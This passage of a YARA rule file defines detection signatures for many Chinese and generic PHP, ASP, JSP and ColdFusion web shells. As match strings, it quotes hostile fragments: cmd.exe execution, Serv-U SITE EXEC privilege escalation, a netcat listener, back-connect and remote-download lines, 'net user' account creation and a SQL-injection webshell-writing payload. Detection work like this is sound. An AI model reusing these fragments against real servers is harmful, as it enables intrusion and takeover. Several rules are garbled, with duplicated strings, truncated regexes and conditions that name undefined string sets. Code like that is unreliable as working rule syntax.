	$s0 = "string iVDT=\"-SETUSERSETUP\\r\\n-IP=0.0.0.0\\r\\n-PortNo=52521\\r\\n-User=bin" ascii /* PEStudio Blacklist: strings */
	$s1 = "SQLExec : <asp:DropDownList runat=\"server\" ID=\"FGEy\" AutoPostBack=\"True\" O" ascii /* PEStudio Blacklist: strings */
	$s2 = "td.Text=\"<a href=\\\"javascript:Bin_PostBack('urJG','\"+dt.Rows[j][\"ProcessID" ascii /* PEStudio Blacklist: strings */
	$s3 = "vyX.Text+=\"<a href=\\\"javascript:Bin_PostBack('Bin_Regread','\"+MVVJ(rootkey)+" ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 353KB and 2 of them
}
rule Php_Webshell_CN_Honker_Webshell_su7_x_9_x
{
strings:
	$s0 = "returns=httpopen(\"LoginID=\"&user&\"&FullName=&Password=\"&pass&\"&ComboPasswor" ascii /* PEStudio Blacklist: strings */
	$s1 = "returns=httpopen(\"\",\"POST\",\"http://127.0.0.1:\"&port&\"/Admin/XML/User.xml?" ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 59KB and all of them
}
rule Php_Webshell_CN_Honker_Webshell_cfmShell
{
strings:
	$s0 = "<cfexecute name=\"C:\\Winnt\\System32\\cmd.exe\"" fullword ascii /* PEStudio Blacklist: strings */
	$s4 = "<cfif FileExists(\"#GetTempDirectory()#foobar.txt\") is \"Yes\">" fullword ascii
condition:
	filesize < 4KB and all of them
}
rule Asp_Webshell_CN_Honker_Webshell_ASP_asp4
{
strings:
	$s2 = "if ShellPath=\"\" Then ShellPath = \"cmd.exe\"" fullword ascii /* PEStudio Blacklist: strings */
	$s6 = "Response.Cookies(Cookie_Login) = sPwd" fullword ascii /* PEStudio Blacklist: strings */
	$s8 = "Set DD=CM.exec(ShellPath&\" /c \"&DefCmd)" fullword ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 150KB and all of them
}
rule Php_Webshell_CN_Honker_Webshell_Serv_U_2_admin_by_lake2
{
strings:
	$s1 = "xPost3.Open \"POST\", \"http://127.0.0.1:\"& port &\"/lake2\", True" fullword ascii /* PEStudio Blacklist: strings */
	$s2 = "response.write \"FTP user lake  pass admin123 :)<br><BR>\"" fullword ascii /* PEStudio Blacklist: strings */
	$s8 = "<p>Serv-U Local Get SYSTEM Shell with ASP" fullword ascii /* PEStudio Blacklist: strings */
	$s9 = "\"-HomeDir=c:\\\\\" & vbcrlf & \"-LoginMesFile=\" & vbcrlf & \"-Disable=0\" & vb" ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 17KB and 2 of them
}
rule Php_Webshell_CN_Honker_Webshell_PHP_php3
{
strings:
	$s1 = "} elseif(@is_resource($f = @popen($cfe,\"r\"))) {" fullword ascii /* PEStudio Blacklist: strings */
	$s2 = "cf('/tmp/.bc',$back_connect);" fullword ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 8KB and all of them
}
rule Php_Webshell_CN_Honker_Webshell_Serv_U_by_Goldsun
{
strings:
	$s1 = "b.open \"GET\", \"http://127.0.0.1:\" & ftpport & \"/goldsun/upadmin/s2\", True," ascii /* PEStudio Blacklist: strings */
	$s2 = "newuser = \"-SETUSERSETUP\" & vbCrLf & \"-IP=0.0.0.0\" & vbCrLf & \"-PortNo=\" &" ascii /* PEStudio Blacklist: strings */
	$s3 = "127.0.0.1:<%=port%>," fullword ascii /* PEStudio Blacklist: strings */
	$s4 = "GName=\"http://\" & request.servervariables(\"server_name\")&\":\"&request.serve" ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 30KB and 2 of them
}
rule Php_Webshell_CN_Honker_Webshell_PHP_php10
{
strings:
	$s1 = "dumpTable($N,$M,$Hc=false){if($_POST[\"format\"]!=\"sql\"){echo\"\\xef\\xbb\\xbf" ascii /* PEStudio Blacklist: strings */
	$s2 = "';if(DB==\"\"||!$od){echo\"<a href='\".h(ME).\"sql='\".bold(isset($_GET[\"sql\"]" ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 600KB and all of them
}
rule Php_Webshell_CN_Honker_Webshell_Serv_U_servu
{
strings:
	$s0 = "fputs ($conn_id, \"SITE EXEC \".$dir.\"cmd.exe /c \".$cmd.\"\\r\\n\");" fullword ascii /* PEStudio Blacklist: strings */
	$s1 = "function ftpcmd($ftpport,$user,$password,$dir,$cmd){" fullword ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 41KB and all of them
}
rule Jsp_Webshell_CN_Honker_Webshell_portRecall_jsp2
{
strings:
	$s0 = "final String remoteIP =request.getParameter(\"remoteIP\");" fullword ascii /* PEStudio Blacklist: strings */
	$s4 = "final String localIP = request.getParameter(\"localIP\");" fullword ascii /* PEStudio Blacklist: strings */
	$s20 = "final String localPort = \"3390\";//request.getParameter(\"localPort\");" fullword ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 23KB and all of them
}
rule Asp_Webshell_CN_Honker_Webshell_ASPX_aspx2
{
strings:
	$s0 = "if (password.Equals(this.txtPass.Text))" fullword ascii /* PEStudio Blacklist: strings */
	$s1 = "<head runat=\"server\">" fullword ascii /* PEStudio Blacklist: strings */
	$s2 = ":<asp:TextBox runat=\"server\" ID=\"txtPass\" Width=\"400px\"></asp:TextBox>" fullword ascii /* PEStudio Blacklist: strings */
	$s3 = "this.lblthispath.Text = Server.MapPath(Request.ServerVariables[\"PATH_INFO\"]);" fullword ascii /* PEStudio Blacklist: strings */
condition:
	uint16(0) == 0x253c and filesize < 9KB and all of them
}
rule Asp_Webshell_CN_Honker_Webshell_ASP_hy2006a
{
strings:
	$s15 = "Const myCmdDotExeFile = \"command.com\"" fullword ascii /* PEStudio Blacklist: strings */
	$s16 = "If LCase(appName) = \"cmd.exe\" And appArgs <> \"\" Then" fullword ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 406KB and all of them
}
rule Php_Webshell_CN_Honker_Webshell_PHP_php1
{
strings:
	$s7 = "$sendbuf = \"site exec \".$_POST[\"SUCommand\"].\"\\r\\n\";" fullword ascii /* PEStudio Blacklist: strings */
	$s8 = "elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$res = @ob_get_c" ascii /* PEStudio Blacklist: strings */
	$s18 = "echo Exec_Run($perlpath.' /tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport" ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 621KB and all of them
}
rule Jsp_Webshell_CN_Honker_Webshell_jspshell2
{
strings:
	$s10 = "if (cmd == null) cmd = \"cmd.exe /c set\";" fullword ascii /* PEStudio Blacklist: strings */
	$s11 = "if (program == null) program = \"cmd.exe /c net start > \"+SHELL_DIR+\"/Log.txt" ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 424KB and all of them
}
rule Php_Webshell_CN_Honker_Webshell_PHP_php9
{
strings:
	$s1 = "Str[17] = \"select shell('c:\\windows\\system32\\cmd.exe /c net user b4che10r ab" ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 1087KB and all of them
}
rule Jsp_Webshell_CN_Honker_Webshell_portRecall_jsp
{
strings:
	$s0 = "lcx.jsp?localIP=202.91.246.59&localPort=88&remoteIP=218.232.111.187&remotePort=2" ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 1KB and all of them
}
rule Asp_Webshell_CN_Honker_Webshell_ASPX_aspx3
{
strings:
	$s0 = "Process p1 = Process.Start(\"\\\"\" + txtRarPath.Value + \"\\\"\", \" a -y -k -m" ascii /* PEStudio Blacklist: strings */
	$s12 = "if (_Debug) System.Console.WriteLine(\"\\ninserting filename into CDS:" ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 100KB and all of them
}
rule Asp_Webshell_CN_Honker_Webshell_ASPX_shell_shell
{
strings:
	$s0 = "<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cook" ascii /* PEStudio Blacklist: strings */
	$s1 = "<%@ Page Language=\"C#\" ValidateRequest=\"false\" %>" fullword ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 1KB and all of them
}
rule Php_Webshell_CN_Honker_Webshell__php1_php7_php9
{
strings:
	$s1 = "<a href=\"?s=h&o=wscript\">[WScript.shell]</a> " fullword ascii /* PEStudio Blacklist: strings */
	$s2 = "document.getElementById('cmd').value = Str[i];" fullword ascii
	$s3 = "Str[7] = \"copy c:\\\\\\\\1.php d:\\\\\\\\2.php\";" fullword ascii
condition:
	filesize < 300KB and all of them
}
rule Asp_Webshell_CN_Honker_Webshell__Serv_U_by_Goldsun_asp3_Serv_U_asp
{
strings:
	$s1 = "c.send loginuser & loginpass & mt & deldomain & quit" fullword ascii /* PEStudio Blacklist: strings */
	$s2 = "loginpass = \"Pass \" & pass & vbCrLf" fullword ascii /* PEStudio Blacklist: strings */
	$s3 = "b.send \"User go\" & vbCrLf & \"pass od\" & vbCrLf & \"site exec \" & cmd & vbCr" ascii
condition:
	filesize < 444KB and all of them
}
rule Asp_Webshell_CN_Honker_Webshell__asp4_asp4_MSSQL__MSSQL_
{
strings:
	$s0 = "\"<form name=\"\"searchfileform\"\" action=\"\"?action=searchfile\"\" method=\"" ascii /* PEStudio Blacklist: strings */
	$s1 = "\"<TD ALIGN=\"\"Left\"\" colspan=\"\"5\"\">[\"& DbName & \"]" fullword ascii
	$s2 = "Set Conn = Nothing " fullword ascii
condition:
	filesize < 341KB and all of them
}
rule Php_Webshell_CN_Honker_Webshell__Injection_jmCook_jmPost_ManualInjection
{
strings:
	$s1 = "response.write  PostData(JMUrl,JmStr,JmCok,JmRef)" fullword ascii /* PEStudio Blacklist: strings */
	$s2 = "strReturn=Replace(strReturn,chr(43),\"%2B\")  'JMDCW" fullword ascii
condition:
	filesize < 7342KB and all of them
}
rule Php_Webshell_CN_Honker_Webshell_cmfshell
{
strings:
	$s1 = "<cfexecute name=\"C:\\Winnt\\System32\\cmd.exe\"" fullword ascii /* PEStudio Blacklist: strings */
	$s2 = "<form action=\"<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>\" method=\"post\">" fullword ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 4KB and all of them
}
rule Php_Webshell_CN_Honker_Webshell_PHP_php4
{
strings:
	$s0 = "nc -l -vv -p port(" fullword ascii /* PEStudio Blacklist: strings */
condition:
	uint16(0) == 0x4850 and filesize < 1KB and all of them
}
rule Php_Webshell_CN_Honker_Webshell_Linux_2_6_Exploit
{
strings:
	$s0 = "[+] Failed to get root :( Something's wrong.  Maybe the kernel isn't vulnerable?" fullword ascii
condition:
	filesize < 56KB and all of them
}
rule Asp_Webshell_CN_Honker_Webshell_ASP_asp2
{
strings:
	$s1 = "<%=server.mappath(request.servervariables(\"script_name\"))%>" fullword ascii /* PEStudio Blacklist: strings */
	$s2 = "webshell</font> <font color=#00FF00>" fullword ascii /* PEStudio Blacklist: strings */
	$s3 = "Userpwd = \"admin\"   'User Password" fullword ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 10KB and all of them
}
rule Php_Webshell_CN_Honker_Webshell_FTP_MYSQL_MSSQL_SSH
{
strings:
	$s1 = "$_SESSION['hostlist'] = $hostlist = $_POST['hostlist'];" fullword ascii /* PEStudio Blacklist: strings */
	$s2 = "Codz by <a href=\"http://www.sablog.net/blog\">4ngel</a><br />" fullword ascii
	$s3 = "if ($conn_id = @ftp_connect($host, $ftpport)) {" fullword ascii /* PEStudio Blacklist: strings */
	$s4 = "$_SESSION['sshport'] = $mssqlport = $_POST['sshport'];" fullword ascii /* PEStudio Blacklist: strings */
	$s5 = "<title>ScanPass(FTP/MYSQL/MSSQL/SSH) by 4ngel" fullword ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 20KB and 3 of them
}
rule Asp_Webshell_CN_Honker_Webshell_ASP_shell
{
strings:
	$s1 = "xPost.Open \"GET\",\"http://www.i0day.com/1.txt\",False //" fullword ascii /* PEStudio Blacklist: strings */
	$s2 = "sGet.SaveToFile Server.MapPath(\"test.asp\"),2 //" fullword ascii /* PEStudio Blacklist: strings */
	$s3 = "http://hi.baidu.com/xahacker/fuck.txt" fullword ascii
condition:
	filesize < 1KB and all of them
}
rule Php_Webshell_CN_Honker_Webshell_PHP_php7
{
strings:
	$s0 = "---> '.$ports[$i].'
    '; ob_flush(); flush(); } } echo ''; return true; }" ascii /* PEStudio Blacklist: strings */
	$s1 = "$getfile = isset($_POST['downfile']) ? $_POST['downfile'] : ''; $getaction = iss" ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 300KB and all of them
}
rule Asp_Webshell_CN_Honker_Webshell_ASP_rootkit
{
strings:
	$s0 = "set ss=zsckm.get(\"Win32_ProcessSta\"&uyy&\"rtup\")" fullword ascii /* PEStudio Blacklist: strings */
	$s1 = "If jzgm=\"\"Then jzgm=\"cmd.exe /c net user\"" fullword ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 80KB and all of them
}
rule Jsp_Webshell_CN_Honker_Webshell_jspshell
{
strings:
	$s1 = "else if(Z.equals(\"M\")){String[] c={z1.substring(2),z1.substring(0,2),z2};Proce" ascii /* PEStudio Blacklist: strings */
	$s2 = "String Z=EC(request.getParameter(Pwd)+\"\",cs);String z1=EC(request.getParameter" ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 30KB and all of them
}
rule Php_Webshell_CN_Honker_Webshell_Serv_U_serv_u
{
strings:
	$s1 = "@readfile(\"c:\\\\winnt\\\\system32\\" fullword ascii /* PEStudio Blacklist: strings */
	$s2 = "$sendbuf = \"PASS \".$_POST[\"password\"].\"\\r\\n\";" fullword ascii /* PEStudio Blacklist: strings */
	$s3 = "$cmd=\"cmd /c rundll32.exe $path,install $openPort $activeStr\";" fullword ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 435KB and all of them
}
rule Php_Webshell_CN_Honker_Webshell_WebShell
{
strings:
	$s1 = "$login = crypt($WebShell::Configuration::password, $salt);" fullword ascii /* PEStudio Blacklist: strings */
	$s2 = "my $error = \"This command is not available in the restricted mode.\\n\";" fullword ascii /* PEStudio Blacklist: strings */
	$s3 = "warn \"command: '$command'\\n\";" fullword ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 30KB and 2 of them
}
rule Php_Webshell_CN_Honker_Webshell_Tuoku_script_mssql_2
{
strings:
	$s1 = "sqlpass=request(\"sqlpass\")" fullword ascii /* PEStudio Blacklist: strings */
	$s2 = "set file=fso.createtextfile(server.mappath(request(\"filename\")),8,true)" fullword ascii /* PEStudio Blacklist: strings */
	$s3 = "
     ServerIP:   " fullword ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 3KB and all of them
}
rule Asp_Webshell_CN_Honker_Webshell_ASP_asp1
{
strings:
	$s1 = "SItEuRl=" ascii
	$s2 = "<%@ LANGUAGE = VBScript.Encode %><%" fullword ascii /* PEStudio Blacklist: strings */
	$s3 = "Server.ScriptTimeout=" ascii /* PEStudio Blacklist: strings */
condition:
	filesize < 200KB and all of them
}
rule Php_Webshell_webshell_php_gzinflated
{
strings:
	$payload2 = /eval\s?\(\s?("\?>".)?gzinflate\s?\(\s?base64_decode\s?\(/  ascii nocase
	$payload4 = /eval\s?\(\s?("\?>".)?gzuncompress\s?\(\s?(base64_decode|gzuncompress)/  ascii nocase
	$payload6 = /eval\s?\(\s?("\?>".)?gzdecode\s?\(\s?base64_decode\s?\(/  ascii nocase
	$payload7 = /eval\s?\(\s?base64_decode\s?\(/  ascii nocase
	$payload8 = /eval\s?\(\s?pack\s?\(/  ascii nocase
	$fp1 = "YXBpLnRlbGVncmFtLm9"
	$gfp1 = "eval(\"return [$serialised_parameter" // elgg
	$gfp2 = "$this->assert(strpos($styles, $"
	$gfp3 = "$module = new $_GET['module']($_GET['scope']);"
	$gfp4 = "$plugin->$_POST['action']($_POST['id']);"
	$gfp5 = "$_POST[partition_by]($_POST["
	$gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);"
	$gfp7 = "The above example code can be easily exploited by passing in a string such as" // ... ;)
	$gfp8 = "Smarty_Internal_Debug::start_render($_template);"
	$gfp9 = "?p4yl04d=UNION%20SELECT%20'',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php"
	$gfp10 = "[][}{;|]\\|\\\\[+=]\\|?"
	$gfp11 = "(eval (getenv \"EPROLOG\")))"
	$gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ"
	$php_short = "\"" nocase wide ascii
	$php_short = "assert(strpos($styles, $"
	$gfp3 = "$module = new $_GET['module']($_GET['scope']);"
	$gfp4 = "$plugin->$_POST['action']($_POST['id']);"
	$gfp5 = "$_POST[partition_by]($_POST["
	$gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);"
	$gfp7 = "The above example code can be easily exploited by passing in a string such as" // ... ;)
	$gfp8 = "Smarty_Internal_Debug::start_render($_template);"
	$gfp9 = "?p4yl04d=UNION%20SELECT%20'',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php"
	$gfp10 = "[][}{;|]\\|\\\\[+=]\\|?"
	$gfp11 = "(eval (getenv \"EPROLOG\")))"
	$gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ"
	$inp1 = "php://input" wide ascii
	$inp2 = /_GET\s?\[/  ascii
	$inp3 = /\(\s?\$_GET\s?\)/  ascii
	$inp4 = /_POST\s?\[/  ascii
	$inp5 = /\(\s?\$_POST\s?\)/  ascii
	$inp6 = /_REQUEST\s?\[/  ascii
	$inp7 = /\(\s?\$_REQUEST\s?\)/  ascii
	$inp15 = "_SERVER['HTTP_" wide ascii
	$inp16 = "_SERVER[\"HTTP_" wide ascii
	$inp17 = /getenv[\t ]{0,20}\([\t ]{0,20}['"]HTTP_/ ascii
	$inp18 = "array_values($_SERVER)" wide ascii
	$inp19 = /file_get_contents\("https?:\/\// ascii
condition:
	filesize < 700KB and ( ( ( $php_short in (0..100) or $php_short in (filesize-1000..filesize) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and not ( any of ( $gfp* ) ) and ( 2 of ( $sstring* ) or ( 1 of ( $sstring* ) and ( any of ( $inp* ) ) ) )
}
rule Php_Webshell_webshell_php_dynamic_big
{
strings:
	$dex = { 64 65 ( 78 | 79 ) 0a 30 }
	$pack = { 50 41 43 4b 00 00 00 02 00 }
	$new_php2 = ""\.|\$cmd|\$password="|\$password='|whoami|portscan|Cyber|\/bin\/sh|"execute"|'cmd'|dumper|\.ssh\/authorized_keys| \^ \$|suhosin|bypass|Shell|shell_|
    |
    |crack|Content-Transfer-Encoding: Binary)/ ascii
	$gen_bit_sus74 = /\btouch\(\$[^,]{1,30},/  ascii
	$gen_much_sus37 = /(rootkit|Rootkit|grayhat|hacker|hacked|HACKED|Hacker|TVqQAAMAAA|Exploit|exploit|'unsafe|"unsafe|nishang|McAfee|antivirus|pcAnywhere|WScript\.Shell\.1|hidded shell|WebShell|Web Shell)/ ascii
	$gen_much_sus38 = /(eval\(eval\(|\("\/\*\/"|\/\*\/\/\*\/|"u"\+"e|q"\+"u"|"\+"\("\+"|a"\+"l"|"e"\+"v|u"\+"n"\+"s|\/\*-\/\*-\*\/)/ ascii
	$gen_much_sus48 = /(-name config\.inc\.php|grep -li password|-perm -02000|-perm -04000|_\.=\$_|\+\+;\$|\+\+; \$|_=\$\$_|-Expire=0|PasswordType=Regular|Shell\.Users|unlink\(__FILE__\))/  ascii
	$gen_much_sus75 = /(password crack|mysqlDll\.dll|net user|suhosin\.executor\.disable_|disabled_suhosin|fopen\("\.htaccess","w|strrev\(['"]|PHPShell|PHP Shell|phpshell|PHPshell|deface|Deface|backdoor|r00t|xp_cmdshell)/ ascii
	$gif = { 47 49 46 38 }
condition:
	filesize < 500KB and not ( uint16(0) == 0x5a4d or $dex at 0 or $pack at 0 or uint16(0) == 0x4b50 ) and ( any of ( $new_php* ) or $php_short at 0 ) and ( any of ( $dynamic* ) ) and ( $gif at 0 or ( filesize < 4KB and ( 1 of ( $gen_much_sus* ) or 2 of ( $gen_bit_sus* ) ) ) or ( filesize < 20KB and ( 2 of ( $gen_much_sus* ) or 3 of ( $gen_bit_sus* ) ) ) or ( filesize < 500KB and ( 2 of ( $gen_much_sus* ) or 4 of ( $gen_bit_sus* ) ) ) )
}
rule Php_Webshell_webshell_php_generic_callback
{
strings:
	$gfp1 = "eval(\"return [$serialised_parameter" // elgg
	$gfp2 = "$this->assert(strpos($styles, $"
	$gfp3 = "$module = new $_GET['module']($_GET['scope']);"
	$gfp4 = "$plugin->$_POST['action']($_POST['id']);"
	$gfp5 = "$_POST[partition_by]($_POST["
	$gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);"
	$gfp7 = "The above example code can be easily exploited by passing in a string such as" // ... ;)
	$gfp8 = "Smarty_Internal_Debug::start_render($_template);"
	$gfp9 = "?p4yl04d=UNION%20SELECT%20'',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php"
	$gfp10 = "[][}{;|]\\|\\\\[+=]\\|?"
	$gfp11 = "(eval (getenv \"EPROLOG\")))"
	$gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ"
	$gfp_tiny3 = /(echo shell_exec\(\$|assert\('array_key_exists\(|assert\(FALSE\)|assert\(false\)|include "\.\/common\.php")|\(('[\d,a-zA-Z]',){3}/ ascii
	$inp1 = "php://input" wide ascii
	$inp2 = /_GET\s?\[/  ascii
	$inp3 = /\(\s?\$_GET\s?\)/  ascii
	$inp4 = /_POST\s?\[/  ascii
	$inp5 = /\(\s?\$_POST\s?\)/  ascii
	$inp6 = /_REQUEST\s?\[/  ascii
	$inp7 = /\(\s?\$_REQUEST\s?\)/  ascii
	$inp15 = "_SERVER['HTTP_" wide ascii
	$inp16 = "_SERVER[\"HTTP_" wide ascii
	$inp17 = /getenv[\t ]{0,20}\([\t ]{0,20}['"]HTTP_/  ascii
	$inp18 = "array_values($_SERVER)" wide ascii
	$inp19 = /file_get_contents\("https?:\/\//  ascii
	$callback1 = /(\bmb_ereg_replace_callback[\t ]*\([^)]|\bsqlite_create_function[\t ]*\([^)]|\bsqlite_create_aggregate[\t ]*\([^)]|\bsession_set_save_handler[\t ]*\([^)]|\bset_exception_handler[\t ]*\([^)]|\bset_error_handler[\t ]*\([^)]|\bregister_tick_function[\t ]*\([^)])/ ascii
	$callback2 = /(\barray_udiff_assoc[\t ]*\([^)]|\barray_reduce[\t ]*\([^)]|\barray_map[\t ]*\([^)]|\barray_intersect_ukey[\t ]*\([^)]|\barray_intersect_uassoc[\t ]*\([^)]|\barray_filter[\t ]*\([^)]|\barray_diff_ukey[\t ]*\([^)]|\barray_diff_uassoc[\t ]*\([^)]|\bob_start[\t ]*\([^)])/ ascii
	$callback3 = /(\bregister_shutdown_function[\t ]*\([^)]|\bcall_user_func_array[\t ]*\([^)]|\bcall_user_func[\t ]*\([^)]|\biterator_apply[\t ]*\([^)]|\bspl_autoload_register[\t ]*\([^)]|\bpreg_replace_callback[\t ]*\([^)]|\busort[\t ]*\([^)]|\buksort[\t ]*\([^)]|\buasort[\t ]*\([^)])/ ascii
	$callback4 = /(forward_static_call_array|\bassert_options[\t ]*\([^)]|\barray_walk[\t ]*\([^)]|\barray_walk_recursive[\t ]*\([^)]|\barray_uintersect[\t ]*\([^)]|\barray_uintersect_uassoc[\t ]*\([^)]|\barray_uintersect_assoc[\t ]*\([^)]|\barray_udiff[\t ]*\([^)]|\barray_udiff_uassoc[\t ]*\([^)])/ ascii
	$m_callback1 = /\bfilter_var[\t ]*\([^)]/ nocase  ascii
	$m_callback2 = "FILTER_CALLBACK" fullword wide ascii
	$cfp1 = /ob_start\(['\"]ob_gzhandler/ nocase  ascii
	$cfp2 = "IWPML_Backend_Action_Loader" ascii wide
	$cfp3 = ""\.|\$cmd|\$password="|\$password='|whoami|portscan|Cyber|\/bin\/sh|"execute"|'cmd'|dumper|\.ssh\/authorized_keys| \^ \$|suhosin|bypass|Shell|shell_|
    |
    |crack|Content-Transfer-Encoding: Binary)/ ascii
	$gen_bit_sus74 = /\btouch\(\$[^,]{1,30},/  ascii
	$gen_much_sus37 = /(rootkit|Rootkit|grayhat|hacker|hacked|HACKED|Hacker|TVqQAAMAAA|Exploit|exploit|'unsafe|"unsafe|nishang|McAfee|antivirus|pcAnywhere|WScript\.Shell\.1|hidded shell|WebShell|Web Shell)/ ascii
	$gen_much_sus38 = /(eval\(eval\(|\("\/\*\/"|\/\*\/\/\*\/|"u"\+"e|q"\+"u"|"\+"\("\+"|a"\+"l"|"e"\+"v|u"\+"n"\+"s|\/\*-\/\*-\*\/)/ ascii
	$gen_much_sus48 = /(-name config\.inc\.php|grep -li password|-perm -02000|-perm -04000|_\.=\$_|\+\+;\$|\+\+; \$|_=\$\$_|-Expire=0|PasswordType=Regular|Shell\.Users|unlink\(__FILE__\))/  ascii
	$gen_much_sus75 = /(password crack|mysqlDll\.dll|net user|suhosin\.executor\.disable_|disabled_suhosin|fopen\("\.htaccess","w|strrev\(['"]|PHPShell|PHP Shell|phpshell|PHPshell|deface|Deface|backdoor|r00t|xp_cmdshell)/ ascii
	$gif = { 47 49 46 38 }
condition:
	not ( any of ( $gfp* ) ) and not ( any of ( $gfp_tiny* ) ) and ( any of ( $inp* ) ) and ( not any of ( $cfp* ) and ( any of ( $callback* )  or all of ( $m_callback* ) ) ) and ( filesize < 1000 or ( $gif at 0 or ( filesize < 4KB and ( 1 of ( $gen_much_sus* ) or 2 of ( $gen_bit_sus* ) ) ) or ( filesize < 20KB and ( 2 of ( $gen_much_sus* ) or 3 of ( $gen_bit_sus* ) ) ) or ( filesize < 500KB and ( 2 of ( $gen_much_sus* ) or 4 of ( $gen_bit_sus* ) ) ) ) )
}
rule Php_Webshell_webshell_php_in_htaccess
{
strings:
	$hta = "AddType application/x-httpd-php .htaccess" wide ascii
condition:
	filesize <100KB and $hta
}
rule Php_Webshell_Torjan_webshell_in_image_picture_php
{
strings:
	$gif = /^GIF8[79]a/
	$jfif = { ff d8 ff e? 00 10 4a 46 49 46 }
	$png = { 89 50 4e 47 0d 0a 1a 0a }
	$php_tag = "&1'\);|assert\('array_key_exists\(|assert\(FALSE\);|assert\(false\);|assert\('FALSE'\);|include \".\/common\.php";/ ascii
	$php_short = ""\.|\$cmd|\$password="|\$password='|whoami|portscan|Cyber|\/bin\/sh|"execute"|'cmd'|dumper|\.ssh\/authorized_keys| \^ \$|suhosin|bypass|Shell|shell_|
    |
    |crack|Content-Transfer-Encoding: Binary)/ ascii
	$gen_bit_sus74 = /\btouch\(\$[^,]{1,30},/  ascii
	$gen_much_sus37 = /(rootkit|Rootkit|grayhat|hacker|hacked|HACKED|Hacker|TVqQAAMAAA|Exploit|exploit|'unsafe|"unsafe|nishang|McAfee|antivirus|pcAnywhere|WScript\.Shell\.1|hidded shell|WebShell|Web Shell)/ ascii
	$gen_much_sus38 = /(eval\(eval\(|\("\/\*\/"|\/\*\/\/\*\/|"u"\+"e|q"\+"u"|"\+"\("\+"|a"\+"l"|"e"\+"v|u"\+"n"\+"s|\/\*-\/\*-\*\/)/ ascii
	$gen_much_sus48 = /(-name config\.inc\.php|grep -li password|-perm -02000|-perm -04000|_\.=\$_|\+\+;\$|\+\+; \$|_=\$\$_|-Expire=0|PasswordType=Regular|Shell\.Users|unlink\(__FILE__\))/  ascii
	$gen_much_sus75 = /(password crack|mysqlDll\.dll|net user|suhosin\.executor\.disable_|disabled_suhosin|fopen\("\.htaccess","w|strrev\(['"]|PHPShell|PHP Shell|phpshell|PHPshell|deface|Deface|backdoor|r00t|xp_cmdshell)/ ascii
	$gif = { 47 49 46 38 }
condition:
	not ( any of ( $gfp_tiny* ) ) and ( ( ( $php_short in (0..100) or $php_short in (filesize-1000..filesize) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and ( any of ( $inp* ) ) and ( any of ( $cpayload* ) or all of ( $m_cpayload_preg_filter* ) ) and ( ( filesize < 1000 and not any of ( $wfp_tiny* ) ) or ( ( $gif at 0 or ( filesize < 4KB and ( 1 of ( $gen_much_sus* ) or 2 of ( $gen_bit_sus* ) ) ) or ( filesize < 20KB and ( 2 of ( $gen_much_sus* ) or 3 of ( $gen_bit_sus* ) ) ) or ( filesize < 50KB and ( 2 of ( $gen_much_sus* ) or 4 of ( $gen_bit_sus* ) ) ) or ( filesize < 100KB and ( 2 of ( $gen_much_sus* ) or 6 of ( $gen_bit_sus* ) ) ) or ( filesize < 150KB and ( 3 of ( $gen_much_sus* ) or 7 of ( $gen_bit_sus* ) ) ) or ( filesize < 500KB and ( 4 of ( $gen_much_sus* ) or 8 of ( $gen_bit_sus* ) ) ) ) and ( filesize > 5KB or not any of ( $wfp_tiny* ) ) ) or ( filesize < 500KB and ( 4 of ( $cmpayload* ) ) ) )
}
rule Php_Webshell_webshell_php_by_string_obfuscation
{
strings:
	$opbs13 = "{\"_P\"./*-/*-*/\"OS\"./*-/*-*/\"T\"}" wide ascii
	$opbs14 = "/*-/*-*/\"" wide ascii
	$opbs16 = "'ev'.'al'" wide ascii
	$opbs17 = "'e'.'val'" wide ascii
	$opbs18 = "e'.'v'.'a'.'l" wide ascii
	$opbs19 = "bas'.'e6'." wide ascii
	$opbs20 = "ba'.'se6'." wide ascii
	$opbs21 = "as'.'e'.'6'" wide ascii
	$opbs22 = "gz'.'inf'." wide ascii
	$opbs23 = "gz'.'un'.'c" wide ascii
	$opbs24 = "e'.'co'.'d" wide ascii
	$opbs25 = "cr\".\"eat" wide ascii
	$opbs26 = "un\".\"ct" wide ascii
